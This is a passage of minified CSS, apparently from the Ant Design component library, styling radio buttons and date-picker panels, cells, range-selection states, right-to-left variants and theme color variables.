#d9d9d9; box-shadow: none; } @-webkit-keyframes antRadioEffect { 0% { transform: scale(1); opacity: 0.5; } 100% { transform: scale(1.6); opacity: 0; } } @keyframes antRadioEffect { 0% { transform: scale(1); opacity: 0.5; } 100% { transform: scale(1.6); opacity: 0; } } .ant-radio-group.ant-radio-group-rtl { direction: rtl; } .ant-radio-wrapper.ant-radio-wrapper-rtl { margin-right: 0; margin-left: 8px; direction: rtl; } .ant-radio-button-wrapper.ant-radio-button-wrapper-rtl { border-right-width: 0; border-left-width: 1px; } .ant-radio-button-wrapper.ant-radio-button-wrapper-rtl.ant-radio-button-wrapper:not(:first-child)::before { right: -1px; left: 0; } .ant-radio-button-wrapper.ant-radio-button-wrapper-rtl.ant-radio-button-wrapper:first-child { border-right: 1px solid #d9d9d9; border-radius: 0 2px 2px 0; } .ant-radio-button-wrapper-checked:not([class*=' ant-radio-button-wrapper-disabled']).ant-radio-button-wrapper:first-child { border-right-color: var(--ant-primary-5); } .ant-radio-button-wrapper.ant-radio-button-wrapper-rtl.ant-radio-button-wrapper:last-child { border-radius: 2px 0 0 2px; } .ant-radio-button-wrapper.ant-radio-button-wrapper-rtl.ant-radio-button-wrapper-disabled:first-child { border-right-color: #d9d9d9; } /* stylelint-disable at-rule-empty-line-before,at-rule-name-space-after,at-rule-no-unknown */ /* stylelint-disable no-duplicate-selectors */ /* stylelint-disable */ /* stylelint-disable declaration-bang-space-before,no-duplicate-selectors,string-no-newline */ html { --ant-primary-color: #1890ff; --ant-primary-color-hover: #40a9ff; --ant-primary-color-active: #096dd9; --ant-primary-color-outline: rgba(24, 144, 255, 0.2); --ant-primary-1: #e6f7ff; --ant-primary-2: #bae7ff; --ant-primary-3: #91d5ff; --ant-primary-4: #69c0ff; --ant-primary-5: #40a9ff; --ant-primary-6: #1890ff; --ant-primary-7: #096dd9; --ant-primary-color-deprecated-pure: ; --ant-primary-color-deprecated-l-35: #cbe6ff; --ant-primary-color-deprecated-l-20: #7ec1ff; --ant-primary-color-deprecated-t-20: #46a6ff; --ant-primary-color-deprecated-t-50: #8cc8ff; --ant-primary-color-deprecated-f-12: rgba(24, 144, 255, 0.12); --ant-primary-color-active-deprecated-f-30: rgba(230, 247, 255, 0.3); --ant-primary-color-active-deprecated-d-02: #dcf4ff; --ant-success-color: #52c41a; --ant-success-color-hover: #73d13d; --ant-success-color-active: #389e0d; --ant-success-color-outline: rgba(82, 196, 26, 0.2); --ant-success-color-deprecated-bg: #f6ffed; --ant-success-color-deprecated-border: #b7eb8f; --ant-error-color: #ff4d4f; --ant-error-color-hover: #ff7875; --ant-error-color-active: #d9363e; --ant-error-color-outline: rgba(255, 77, 79, 0.2); --ant-error-color-deprecated-bg: #fff2f0; --ant-error-color-deprecated-border: #ffccc7; --ant-warning-color: #faad14; --ant-warning-color-hover: #ffc53d; --ant-warning-color-active: #d48806; --ant-warning-color-outline: rgba(250, 173, 20, 0.2); --ant-warning-color-deprecated-bg: #fffbe6; --ant-warning-color-deprecated-border: #ffe58f; --ant-info-color: #1890ff; --ant-info-color-deprecated-bg: #e6f7ff; --ant-info-color-deprecated-border: #91d5ff; } .ant-picker { box-sizing: border-box; margin: 0; padding: 0; color: rgba(0, 0, 0, 0.85); font-size: 14px; font-variant: tabular-nums; line-height: 1.5715; list-style: none; font-feature-settings: 'tnum'; padding: 4px 11px 4px; position: relative; display: inline-flex; align-items: center; background: #fff; border: 1px solid #d9d9d9; border-radius: 2px; transition: border 0.3s, box-shadow 0.3s; } .ant-picker:hover, .ant-picker-focused { border-color: var(--ant-primary-5); border-right-width: 1px !important; } .ant-picker-focused { border-color: var(--ant-primary-color-hover); box-shadow: 0 0 0 2px var(--ant-primary-color-outline); border-right-width: 1px !important; outline: 0; } .ant-picker.ant-picker-disabled { background: #f5f5f5; border-color: #d9d9d9; cursor: not-allowed; } .ant-picker.ant-picker-disabled .ant-picker-suffix { color: rgba(0, 0, 0, 0.25); } .ant-picker.ant-picker-borderless { background-color: transparent !important; border-color: transparent !important; box-shadow: none !important; } .ant-picker-input { position: relative; display: inline-flex; align-items: center; width: 100%; } .ant-picker-input > input { position: relative; display: inline-block; width: 100%; min-width: 0; padding: 4px 11px; color: rgba(0, 0, 0, 0.85); font-size: 14px; line-height: 1.5715; background-color: #fff; background-image: none; border: 1px solid #d9d9d9; border-radius: 2px; transition: all 0.3s; /* stylelint-disable-next-line selector-no-vendor-prefix */ flex: auto; min-width: 1px; height: auto; padding: 0; background: transparent; border: 0; } .ant-picker-input > input::-moz-placeholder { opacity: 1; } .ant-picker-input > input:-ms-input-placeholder { color: #bfbfbf; -ms-user-select: none; user-select: none; } .ant-picker-input > input::placeholder { color: #bfbfbf; -webkit-user-select: none; -moz-user-select: none; -ms-user-select: none; user-select: none; } .ant-picker-input > input:-moz-placeholder-shown { text-overflow: ellipsis; } .ant-picker-input > input:-ms-input-placeholder { text-overflow: ellipsis; } .ant-picker-input > input:placeholder-shown { text-overflow: ellipsis; } .ant-picker-input > input:hover { border-color: var(--ant-primary-5); border-right-width: 1px !important; } .ant-picker-input > input:focus, .ant-picker-input > input-focused { border-color: var(--ant-primary-color-hover); box-shadow: 0 0 0 2px var(--ant-primary-color-outline); border-right-width: 1px !important; outline: 0; } .ant-picker-input > input-disabled { color: rgba(0, 0, 0, 0.25); background-color: #f5f5f5; border-color: #d9d9d9; box-shadow: none; cursor: not-allowed; opacity: 1; } .ant-picker-input > input-disabled:hover { border-color: #d9d9d9; border-right-width: 1px !important; } .ant-picker-input > input[disabled] { color: rgba(0, 0, 0, 0.25); background-color: #f5f5f5; border-color: #d9d9d9; box-shadow: none; cursor: not-allowed; opacity: 1; } .ant-picker-input > input[disabled]:hover { border-color: #d9d9d9; border-right-width: 1px !important; } .ant-picker-input > input-borderless, .ant-picker-input > input-borderless:hover, .ant-picker-input > input-borderless:focus, .ant-picker-input > input-borderless-focused, .ant-picker-input > input-borderless-disabled, .ant-picker-input > input-borderless[disabled] { background-color: transparent; border: none; box-shadow: none; } textarea.ant-picker-input > input { max-width: 100%; height: auto; min-height: 32px; line-height: 1.5715; vertical-align: bottom; transition: all 0.3s, height 0s; } .ant-picker-input > input-lg { padding: 6.5px 11px; font-size: 16px; } .ant-picker-input > input-sm { padding: 0px 7px; } .ant-picker-input > input:focus { box-shadow: none; } .ant-picker-input > input[disabled] { background: transparent; } .ant-picker-input:hover .ant-picker-clear { opacity: 1; } .ant-picker-input-placeholder > input { color: #bfbfbf; } .ant-picker-large { padding: 6.5px 11px 6.5px; } .ant-picker-large .ant-picker-input > input { font-size: 16px; } .ant-picker-small { padding: 0px 7px 0px; } .ant-picker-suffix { align-self: center; margin-left: 4px; color: rgba(0, 0, 0, 0.25); line-height: 1; pointer-events: none; } .ant-picker-suffix > * { vertical-align: top; } .ant-picker-clear { position: absolute; top: 50%; right: 0; color: rgba(0, 0, 0, 0.25); line-height: 1; background: #fff; transform: translateY(-50%); cursor: pointer; opacity: 0; transition: opacity 0.3s, color 0.3s; } .ant-picker-clear > * { vertical-align: top; } .ant-picker-clear:hover { color: rgba(0, 0, 0, 0.45); } .ant-picker-separator { position: relative; display: inline-block; width: 1em; height: 16px; color: rgba(0, 0, 0, 0.25); font-size: 16px; vertical-align: top; cursor: default; } .ant-picker-focused .ant-picker-separator { color: rgba(0, 0, 0, 0.45); } .ant-picker-disabled .ant-picker-range-separator .ant-picker-separator { cursor: not-allowed; } .ant-picker-range { position: relative; display: inline-flex; } .ant-picker-range .ant-picker-clear { right: 11px; } .ant-picker-range:hover .ant-picker-clear { opacity: 1; } .ant-picker-range .ant-picker-active-bar { bottom: -1px; height: 2px; margin-left: 11px; background: var(--ant-primary-color); opacity: 0; transition: all 0.3s ease-out; pointer-events: none; } .ant-picker-range.ant-picker-focused .ant-picker-active-bar { opacity: 1; } .ant-picker-range-separator { align-items: center; padding: 0 8px; line-height: 1; } .ant-picker-range.ant-picker-small .ant-picker-clear { right: 7px; } .ant-picker-range.ant-picker-small .ant-picker-active-bar { margin-left: 7px; } .ant-picker-dropdown { box-sizing: border-box; margin: 0; padding: 0; color: rgba(0, 0, 0, 0.85); font-size: 14px; font-variant: tabular-nums; line-height: 1.5715; list-style: none; font-feature-settings: 'tnum'; position: absolute; z-index: 1050; } .ant-picker-dropdown-hidden { display: none; } .ant-picker-dropdown-placement-bottomLeft .ant-picker-range-arrow { top: 1.66666667px; display: block; transform: rotate(-45deg); } .ant-picker-dropdown-placement-topLeft .ant-picker-range-arrow { bottom: 1.66666667px; display: block; transform: rotate(135deg); } .ant-picker-dropdown.ant-slide-up-enter.ant-slide-up-enter-active.ant-picker-dropdown-placement-topLeft, .ant-picker-dropdown.ant-slide-up-enter.ant-slide-up-enter-active.ant-picker-dropdown-placement-topRight, .ant-picker-dropdown.ant-slide-up-appear.ant-slide-up-appear-active.ant-picker-dropdown-placement-topLeft, .ant-picker-dropdown.ant-slide-up-appear.ant-slide-up-appear-active.ant-picker-dropdown-placement-topRight { -webkit-animation-name: antSlideDownIn; animation-name: antSlideDownIn; } .ant-picker-dropdown.ant-slide-up-enter.ant-slide-up-enter-active.ant-picker-dropdown-placement-bottomLeft, .ant-picker-dropdown.ant-slide-up-enter.ant-slide-up-enter-active.ant-picker-dropdown-placement-bottomRight, .ant-picker-dropdown.ant-slide-up-appear.ant-slide-up-appear-active.ant-picker-dropdown-placement-bottomLeft, .ant-picker-dropdown.ant-slide-up-appear.ant-slide-up-appear-active.ant-picker-dropdown-placement-bottomRight { -webkit-animation-name: antSlideUpIn; animation-name: antSlideUpIn; } .ant-picker-dropdown.ant-slide-up-leave.ant-slide-up-leave-active.ant-picker-dropdown-placement-topLeft, .ant-picker-dropdown.ant-slide-up-leave.ant-slide-up-leave-active.ant-picker-dropdown-placement-topRight { -webkit-animation-name: antSlideDownOut; animation-name: antSlideDownOut; } .ant-picker-dropdown.ant-slide-up-leave.ant-slide-up-leave-active.ant-picker-dropdown-placement-bottomLeft, .ant-picker-dropdown.ant-slide-up-leave.ant-slide-up-leave-active.ant-picker-dropdown-placement-bottomRight { -webkit-animation-name: antSlideUpOut; animation-name: antSlideUpOut; } .ant-picker-dropdown-range { padding: 6.66666667px 0; } .ant-picker-dropdown-range-hidden { display: none; } .ant-picker-dropdown .ant-picker-panel > .ant-picker-time-panel { padding-top: 4px; } .ant-picker-ranges { margin-bottom: 0; padding: 4px 12px; overflow: hidden; line-height: 34px; text-align: left; list-style: none; } .ant-picker-ranges > li { display: inline-block; } .ant-picker-ranges .ant-picker-preset > .ant-tag-blue { color: var(--ant-primary-color); background: var(--ant-primary-1); border-color: var(--ant-primary-3); cursor: pointer; } .ant-picker-ranges .ant-picker-ok { float: right; margin-left: 8px; } .ant-picker-range-wrapper { display: flex; } .ant-picker-range-arrow { position: absolute; z-index: 1; display: none; width: 10px; height: 10px; margin-left: 16.5px; box-shadow: 2px -2px 6px rgba(0, 0, 0, 0.06); transition: left 0.3s ease-out; } .ant-picker-range-arrow::after { position: absolute; top: 1px; right: 1px; width: 10px; height: 10px; border: 5px solid #f0f0f0; border-color: #fff #fff transparent transparent; content: ''; } .ant-picker-panel-container { overflow: hidden; vertical-align: top; background: #fff; border-radius: 2px; box-shadow: 0 3px 6px -4px rgba(0, 0, 0, 0.12), 0 6px 16px 0 rgba(0, 0, 0, 0.08), 0 9px 28px 8px rgba(0, 0, 0, 0.05); transition: margin 0.3s; } .ant-picker-panel-container .ant-picker-panels { display: inline-flex; flex-wrap: nowrap; direction: ltr; } .ant-picker-panel-container .ant-picker-panel { vertical-align: top; background: transparent; border-width: 0 0 1px 0; border-radius: 0; } .ant-picker-panel-container .ant-picker-panel .ant-picker-content, .ant-picker-panel-container .ant-picker-panel table { text-align: center; } .ant-picker-panel-container .ant-picker-panel-focused { border-color: #f0f0f0; } .ant-picker-panel { display: inline-flex; flex-direction: column; text-align: center; background: #fff; border: 1px solid #f0f0f0; border-radius: 2px; outline: none; } .ant-picker-panel-focused { border-color: var(--ant-primary-color); } .ant-picker-decade-panel, .ant-picker-year-panel, .ant-picker-quarter-panel, .ant-picker-month-panel, .ant-picker-week-panel, .ant-picker-date-panel, .ant-picker-time-panel { display: flex; flex-direction: column; width: 280px; } .ant-picker-header { display: flex; padding: 0 8px; color: rgba(0, 0, 0, 0.85); border-bottom: 1px solid #f0f0f0; } .ant-picker-header > * { flex: none; } .ant-picker-header button { padding: 0; color: rgba(0, 0, 0, 0.25); line-height: 40px; background: transparent; border: 0; cursor: pointer; transition: color 0.3s; } .ant-picker-header > button { min-width: 1.6em; font-size: 14px; } .ant-picker-header > button:hover { color: rgba(0, 0, 0, 0.85); } .ant-picker-header-view { flex: auto; font-weight: 500; line-height: 40px; } .ant-picker-header-view button { color: inherit; font-weight: inherit; } .ant-picker-header-view button:not(:first-child) { margin-left: 8px; } .ant-picker-header-view button:hover { color: var(--ant-primary-color); } .ant-picker-prev-icon, .ant-picker-next-icon, .ant-picker-super-prev-icon, .ant-picker-super-next-icon { position: relative; display: inline-block; width: 7px; height: 7px; } .ant-picker-prev-icon::before, .ant-picker-next-icon::before, .ant-picker-super-prev-icon::before, .ant-picker-super-next-icon::before { position: absolute; top: 0; left: 0; display: inline-block; width: 7px; height: 7px; border: 0 solid currentColor; border-width: 1.5px 0 0 1.5px; content: ''; } .ant-picker-super-prev-icon::after, .ant-picker-super-next-icon::after { position: absolute; top: 4px; left: 4px; display: inline-block; width: 7px; height: 7px; border: 0 solid currentColor; border-width: 1.5px 0 0 1.5px; content: ''; } .ant-picker-prev-icon, .ant-picker-super-prev-icon { transform: rotate(-45deg); } .ant-picker-next-icon, .ant-picker-super-next-icon { transform: rotate(135deg); } .ant-picker-content { width: 100%; table-layout: fixed; border-collapse: collapse; } .ant-picker-content th, .ant-picker-content td { position: relative; min-width: 24px; font-weight: 400; } .ant-picker-content th { height: 30px; color: rgba(0, 0, 0, 0.85); line-height: 30px; } .ant-picker-cell { padding: 3px 0; color: rgba(0, 0, 0, 0.25); cursor: pointer; } .ant-picker-cell-in-view { color: rgba(0, 0, 0, 0.85); } .ant-picker-cell::before { position: absolute; top: 50%; right: 0; left: 0; z-index: 1; height: 24px; transform: translateY(-50%); transition: all 0.3s; content: ''; } .ant-picker-cell .ant-picker-cell-inner { position: relative; z-index: 2; display: inline-block; min-width: 24px; height: 24px; line-height: 24px; border-radius: 2px; transition: background 0.3s, border 0.3s; } .ant-picker-cell:hover:not(.ant-picker-cell-in-view) .ant-picker-cell-inner, .ant-picker-cell:hover:not(.ant-picker-cell-selected):not(.ant-picker-cell-range-start):not(.ant-picker-cell-range-end):not(.ant-picker-cell-range-hover-start):not(.ant-picker-cell-range-hover-end) .ant-picker-cell-inner { background: #f5f5f5; } .ant-picker-cell-in-view.ant-picker-cell-today .ant-picker-cell-inner::before { position: absolute; top: 0; right: 0; bottom: 0; left: 0; z-index: 1; border: 1px solid var(--ant-primary-color); border-radius: 2px; content: ''; } .ant-picker-cell-in-view.ant-picker-cell-in-range { position: relative; } .ant-picker-cell-in-view.ant-picker-cell-in-range::before { background: var(--ant-primary-1); } .ant-picker-cell-in-view.ant-picker-cell-selected .ant-picker-cell-inner, .ant-picker-cell-in-view.ant-picker-cell-range-start .ant-picker-cell-inner, .ant-picker-cell-in-view.ant-picker-cell-range-end .ant-picker-cell-inner { color: #fff; background: var(--ant-primary-color); } .ant-picker-cell-in-view.ant-picker-cell-range-start:not(.ant-picker-cell-range-start-single)::before, .ant-picker-cell-in-view.ant-picker-cell-range-end:not(.ant-picker-cell-range-end-single)::before { background: var(--ant-primary-1); } .ant-picker-cell-in-view.ant-picker-cell-range-start::before { left: 50%; } .ant-picker-cell-in-view.ant-picker-cell-range-end::before { right: 50%; } .ant-picker-cell-in-view.ant-picker-cell-range-hover-start:not(.ant-picker-cell-in-range):not(.ant-picker-cell-range-start):not(.ant-picker-cell-range-end)::after, .ant-picker-cell-in-view.ant-picker-cell-range-hover-end:not(.ant-picker-cell-in-range):not(.ant-picker-cell-range-start):not(.ant-picker-cell-range-end)::after, .ant-picker-cell-in-view.ant-picker-cell-range-hover-start.ant-picker-cell-range-start-single::after, .ant-picker-cell-in-view.ant-picker-cell-range-hover-start.ant-picker-cell-range-start.ant-picker-cell-range-end.ant-picker-cell-range-end-near-hover::after, .ant-picker-cell-in-view.ant-picker-cell-range-hover-end.ant-picker-cell-range-start.ant-picker-cell-range-end.ant-picker-cell-range-start-near-hover::after, .ant-picker-cell-in-view.ant-picker-cell-range-hover-end.ant-picker-cell-range-end-single::after, .ant-picker-cell-in-view.ant-picker-cell-range-hover:not(.ant-picker-cell-in-range)::after { position: absolute; top: 50%; z-index: 0; height: 24px; border-top: 1px dashed var(--ant-primary-color-deprecated-l-20); border-bottom: 1px dashed var(--ant-primary-color-deprecated-l-20); transform: translateY(-50%); transition: all 0.3s; content: ''; } .ant-picker-cell-range-hover-start::after, .ant-picker-cell-range-hover-end::after, .ant-picker-cell-range-hover::after { right: 0; left: 2px; } .ant-picker-cell-in-view.ant-picker-cell-in-range.ant-picker-cell-range-hover::before, .ant-picker-cell-in-view.ant-picker-cell-range-start.ant-picker-cell-range-hover::before, .ant-picker-cell-in-view.ant-picker-cell-range-end.ant-picker-cell-range-hover::before, .ant-picker-cell-in-view.ant-picker-cell-range-start:not(.ant-picker-cell-range-start-single).ant-picker-cell-range-hover-start::before, .ant-picker-cell-in-view.ant-picker-cell-range-end:not(.ant-picker-cell-range-end-single).ant-picker-cell-range-hover-end::before, .ant-picker-panel > :not(.ant-picker-date-panel) .ant-picker-cell-in-view.ant-picker-cell-in-range.ant-picker-cell-range-hover-start::before, .ant-picker-panel > :not(.ant-picker-date-panel) .ant-picker-cell-in-view.ant-picker-cell-in-range.ant-picker-cell-range-hover-end::before { background: var(--ant-primary-color-deprecated-l-35); } .ant-picker-cell-in-view.ant-picker-cell-range-start:not(.ant-picker-cell-range-start-single):not(.ant-picker-cell-range-end) .ant-picker-cell-inner { border-radius: 2px 0 0 2px; } .ant-picker-cell-in-view.ant-picker-cell-range-end:not(.ant-picker-cell-range-end-single):not(.ant-picker-cell-range-start) .ant-picker-cell-inner { border-radius: 0 2px 2px 0; } .ant-picker-date-panel .ant-picker-cell-in-view.ant-picker-cell-in-range.ant-picker-cell-range-hover-start .ant-picker-cell-inner::after, .ant-picker-date-panel .ant-picker-cell-in-view.ant-picker-cell-in-range.ant-picker-cell-range-hover-end .ant-picker-cell-inner::after { position: absolute; top: 0; bottom: 0; z-index: -1; background: var(--ant-primary-color-deprecated-l-35); transition: all 0.3s; content: ''; } .ant-picker-date-panel .ant-picker-cell-in-view.ant-picker-cell-in-range.ant-picker-cell-range-hover-start .ant-picker-cell-inner::after { right: -6px; left: 0; } .ant-picker-date-panel .ant-picker-cell-in-view.ant-picker-cell-in-range.ant-picker-cell-range-hover-end .ant-picker-cell-inner::after { right: 0; left: -6px; } .ant-picker-cell-range-hover.ant-picker-cell-range-start::after { right: 50%; } .ant-picker-cell-range-hover.ant-picker-cell-range-end::after { left: 50%; } tr > .ant-picker-cell-in-view.ant-picker-cell-range-hover:first-child::after, tr > .ant-picker-cell-in-view.ant-picker-cell-range-hover-end:first-child::after, .ant-picker-cell-in-view.ant-picker-cell-start.ant-picker-cell-range-hover-edge-start.ant-picker-cell-range-hover-edge-start-near-range::after, .ant-picker-cell-in-view.ant-picker-cell-range-hover-edge-start:not(.ant-picker-cell-range-hover-edge-start-near-range)::after, .ant-picker-cell-in-view.ant-picker-cell-range-hover-start::after { left: 6px; border-left: 1px dashed var(--ant-primary-color-deprecated-l-20); border-top-left-radius: 2px; border-bottom-left-radius: 2px; } tr > .ant-picker-cell-in-view.ant-picker-cell-range-hover:last-child::after, tr > .ant-picker-cell-in-view.ant-picker-cell-range-hover-start:last-child::after, .ant-picker-cell-in-view.ant-picker-cell-end.ant-picker-cell-range-hover-edge-end.ant-picker-cell-range-hover-edge-end-near-range::after, .ant-picker-cell-in-view.ant-picker-cell-range-hover-edge-end:not(.ant-picker-cell-range-hover-edge-end-near-range)::after, .ant-picker-cell-in-view.ant-picker-cell-range-hover-end::after { right: 6px; border-right: 1px dashed var(--ant-primary-color-deprecated-l-20); border-top-right-radius: 2px; border-bottom-right-radius: 2px; } .ant-picker-cell-disabled { color: rgba(0, 0, 0, 0.25); pointer-events: none; } .ant-picker-cell-disabled .ant-picker-cell-inner { background: transparent; } .ant-picker-cell-disabled::before { background: rgba(0, 0, 0, 0.04); } .ant-picker-cell-disabled.ant-picker-cell-today .ant-picker-cell-inner::before { border-color: rgba(0, 0, 0, 0.25); } .ant-picker-decade-panel .ant-picker-content, .ant-picker-year-panel .ant-picker-content, .ant-picker-quarter-panel .ant-picker-content, .ant-picker-month-panel .ant-picker-content { height: 264px; } .ant-picker-decade-panel .ant-picker-cell-inner, .ant-picker-year-panel .ant-picker-cell-inner, .ant-picker-quarter-panel .ant-picker-cell-inner, .ant-picker-month-panel .ant-picker-cell-inner { padding: 0 8px; } .ant-picker-quarter-panel .ant-picker-content { height: 56px; } .ant-picker-footer { width: -webkit-min-content; width: -moz-min-content; width: min-content; min-width: 100%; line-height: 38px; text-align: center; border-bottom: 1px solid transparent; } .ant-picker-panel .ant-picker-footer { border-top: 1px solid #f0f0f0; } .ant-picker-footer-extra { padding: 0 12px; line-height: 38px; text-align: left; } .ant-picker-footer-extra:not(:last-child) { border-bottom: 1px solid #f0f0f0; } .ant-picker-now { text-align: left; } .ant-picker-today-btn { color: var(--ant-primary-color); } .ant-picker-today-btn:hover { color: var(--ant-primary-color-hover); } .ant-picker-today-btn:active { color: var(--ant-primary-color-active); } .ant-picker-today-btn.ant-picker-today-btn-disabled { color: rgba(0, 0, 0, 0.25); cursor: not-allowed; } .ant-picker-decade-panel .ant-picker-cell-inner { padding: 0 4px; } .ant-picker-decade-panel .ant-picker-cell::before { display: none; } .ant-picker-year-panel .ant-picker-body, .ant-picker-quarter-panel .ant-picker-body, .ant-picker-month-panel .ant-picker-body { padding: 0 8px; } .ant-picker-year-panel .ant-picker-cell-inner, .ant-picker-quarter-panel .ant-picker-cell-inner, .ant-picker-month-panel .ant-picker-cell-inner { width: 60px; } .ant-picker-year-panel .ant-picker-cell-range-hover-start::after, .ant-picker-quarter-panel .ant-picker-cell-range-hover-start::after, .ant-picker-month-panel .ant-picker-cell-range-hover-start::after { left: 14px; border-left: 1px dashed var(--ant-primary-color-deprecated-l-20); border-radius: 2px 0 0 2px; } .ant-picker-panel-rtl .ant-picker-year-panel .ant-picker-cell-range-hover-start::after, .ant-picker-panel-rtl .ant-picker-quarter-panel .ant-picker-cell-range-hover-start::after, .ant-picker-panel-rtl .ant-picker-month-panel .ant-picker-cell-range-hover-start::after { right: 14px; border-right: 1px dashed var(--ant-primary-color-deprecated-l-20); border-radius: 0 2px 2px 0; } .ant-picker-year-panel .ant-picker-cell-range-hover-end::after, .ant-picker-quarter-panel .ant-picker-cell-range-hover-end::after, .ant-picker-month-panel .ant-picker-cell-range-hover-end::after { right: 14px; border-right: 1px dashed var(--ant-primary-color-deprecated-l-20); border-radius: 0 2px 2px 0; } .ant-picker-panel-rtl .ant-picker-year-panel .ant-picker-cell-range-hover-end::after, .ant-picker-panel-rtl .ant-picker-quarter-panel .ant-picker-cell-range-hover-end::after, .ant-picker-panel-rtl .ant-picker-month-panel .ant-picker-cell-range-hover-end::after { left: 14px; border-left: 1px dashed var(--ant-primary-color-deprecated-l-20); border-radius: 2px 0 0 2px; } .ant-picker-week-panel .ant-picker-body { padding: 8px 12px; } .ant-picker-week-panel .ant-picker-cell:hover .ant-picker-cell-inner, .ant-picker-week-panel .ant-picker-cell-selected .ant-picker-cell-inner, .ant-picker-week-panel .ant-picker-cell .ant-picker-cell-inner { background: transparent !important; } .ant-picker-week-panel-row td { transition: background 0.3s; } .ant-picker-week-panel-row:hover td { background: #f5f5f5; } .ant-picker-week-panel-row-selected td, .ant-picker-week-panel-row-selected:hover td { background: var(--ant-primary-color); } .ant-picker-week-panel-row-selected td.ant-picker-cell-week, .ant-picker-week-panel-row-selected:hover td.ant-picker-cell-week { color: rgba(255, 255, 255, 0.5); } .ant-picker-week-panel-row-selected td.ant-picker-cell-today .ant-picker-cell-inner::before, .ant-picker-week-panel-row-selected:hover td.ant-picker-cell-today .ant-picker-cell-inner::before { border-color: #fff; } .ant-picker-week-panel-row-selected td .ant-picker-cell-inner, .ant-picker-week-panel-row-selected:hover td .ant-picker-cell-inner { color: #fff; } .ant-picker-date-panel .ant-picker-body { padding: 8px 12px; } .ant-picker-date-panel .ant-picker-content { width: 252px; } .ant-picker-date-panel .ant-picker-content th { width: 36px; } .ant-picker-datetime-panel { display: flex; } .ant-picker-datetime-panel .ant-picker-time-panel { border-left: 1px solid #f0f0f0; } .ant-picker-datetime-panel .ant-picker-date-panel, .ant-picker-datetime-panel .ant-picker-time-panel { transition: opacity 0.3s; } .ant-picker-datetime-panel-active .ant-picker-date-panel, .ant-picker-datetime-panel-active .ant-picker-time-panel { opacity: 0.3; } .ant-picker-datetime-panel-active .ant-picker-date-panel-active, .ant-picker-datetime-panel-active .ant-picker-time-panel-active { opacity: 1; } .ant-picker-time-panel { width: auto; min-width: auto; } .ant-picker-time-panel .ant-picker-content { display: flex; flex: auto; height: 224px; } .ant-picker-time-panel-column { flex: 1 0 auto; width: 56px; margin: 0; padding: 0; overflow-y: hidden; text-align: left; list-style: none; transition: background 0.3s; } .ant-picker-time-panel-column::after { display: block; height: 196px; content: ''; } .ant-picker-datetime-panel .ant-picker-time-panel-column::after { height: 198px; } .ant-picker-time-panel-column:not(:first-child) { border-left: 1px solid #f0f0f0; } .ant-picker-time-panel-column-active { background: var(--ant-primary-color-active-deprecated-f-30); } .ant-picker-time-panel-column:hover { overflow-y: auto; } .ant-picker-time-panel-column > li { margin: 0; padding: 0; } .ant-picker-time-panel-column > li.ant-picker-time-panel-cell .ant-picker-time-panel-cell-inner { display: block; width: 100%; height: 28px; margin: 0; padding: 0 0 0 14px; color: rgba(0, 0, 0, 0.85); line-height: 28px; border-radius: 0; cursor: pointer; transition: background 0.3s; } .ant-picker-time-panel-column > li.ant-picker-time-panel-cell .ant-picker-time-panel-cell-inner:hover { background: #f5f5f5; } .ant-picker-time-panel-column > li.ant-picker-time-panel-cell-selected .ant-picker-time-panel-cell-inner { background: var(--ant-primary-1); } .ant-picker-time-panel-column > li.ant-picker-time-panel-cell-disabled .ant-picker-time-panel-cell-inner { color: rgba(0, 0, 0, 0.25); background: transparent; cursor: not-allowed; } /* stylelint-disable-next-line selector-type-no-unknown,selector-no-vendor-prefix */ _:-ms-fullscreen .ant-picker-range-wrapper .ant-picker-month-panel .ant-picker-cell, :root .ant-picker-range-wrapper .ant-picker-month-panel .ant-picker-cell, _:-ms-fullscreen .ant-picker-range-wrapper .ant-picker-year-panel .ant-picker-cell, :root .ant-picker-range-wrapper .ant-picker-year-panel .ant-picker-cell { padding: 21px 0; } .ant-picker-rtl { direction: rtl; } .ant-picker-rtl .ant-picker-suffix { margin-right: 4px; margin-left: 0; } .ant-picker-rtl .ant-picker-clear { right: auto; left: 0; } .ant-picker-rtl .ant-picker-separator { transform: rotate(180deg); } .ant-picker-panel-rtl .ant-picker-header-view button:not(:first-child) { margin-right: 8px; margin-left: 0; } .ant-picker-rtl.ant-picker-range .ant-picker-clear { right: auto; left: 11px; } .ant-picker-rtl.ant-picker-range .ant-picker-active-bar { margin-right: 11px; margin-left: 0; } .ant-picker-rtl.ant-picker-range.ant-picker-small .ant-picker-active-bar { margin-right: 7px; } .ant-picker-dropdown-rtl .ant-picker-ranges { text-align: right; } .ant-picker-dropdown-rtl .ant-picker-ranges .ant-picker-ok { float: left; margin-right: 8px; margin-left: 0; } .ant-picker-panel-rtl { direction: rtl; } .ant-picker-panel-rtl .ant-picker-prev-icon, .ant-picker-panel-rtl .ant-picker-super-prev-icon { transform: rotate(135deg); } .ant-picker-panel-rtl .ant-picker-next-icon, .ant-picker-panel-rtl .ant-picker-super-next-icon { transform: rotate(-45deg); } .ant-picker-cell .ant-picker-cell-inner { position: relative; z-index: 2; display: inline-block; min-width: 24px; height: 24px; line-height: 24px; border-radius: 2px; transition: background 0.3s, border 0.3s; } .ant-picker-panel-rtl .ant-picker-cell-in-view.ant-picker-cell-range-start::before { right: 50%; left: 0; } .ant-picker-panel-rtl .ant-picker-cell-in-view.ant-picker-cell-range-end::before { right: 0; left: 50%; } .ant-picker-panel-rtl .ant-picker-cell-in-view.ant-picker-cell-range-start.ant-picker-cell-range-end::before { right: 50%; left: 50%; } .ant-picker-panel-rtl .ant-picker-date-panel .ant-picker-cell-in-view.ant-picker-cell-in-range.ant-picker-cell-range-hover-start .ant-picker-cell-inner::after { right: 0; left: -6px; } .ant-picker-panel-rtl .ant-picker-date-panel .ant-picker-cell-in-view.ant-picker-cell-in-range.ant-picker-cell-range-hover-end .ant-picker-cell-inner::after { right: -6px; left: 0; } .ant-picker-panel-rtl .ant-picker-cell-range-hover.ant-picker-cell-range-start::after { right: 0; left: 50%; } .ant-picker-panel-rtl .ant-picker-cell-range-hover.ant-picker-cell-range-end::after { right: 50%; left: 0; } .ant-picker-panel-rtl .ant-picker-cell-in-view.ant-picker-cell-range-start:not(.ant-picker-cell-range-start-single):not(.ant-picker-cell-range-end) .ant-picker-cell-inner { border-radius: 0 2px 2px 0; } .ant-picker-panel-rtl .ant-picker-cell-in-view.ant-picker-cell-range-end:not(.ant-picker-cell-range-end-single):not(.ant-picker-cell-range-start) .ant-picker-cell-inner { border-radius: 2px 0 0 2px; } .ant-picker-panel-rtl tr > .ant-picker-cell-in-view.ant-picker-cell-range-hover:not(.ant-picker-cell-selected):first-child::after, .ant-picker-panel-rtl 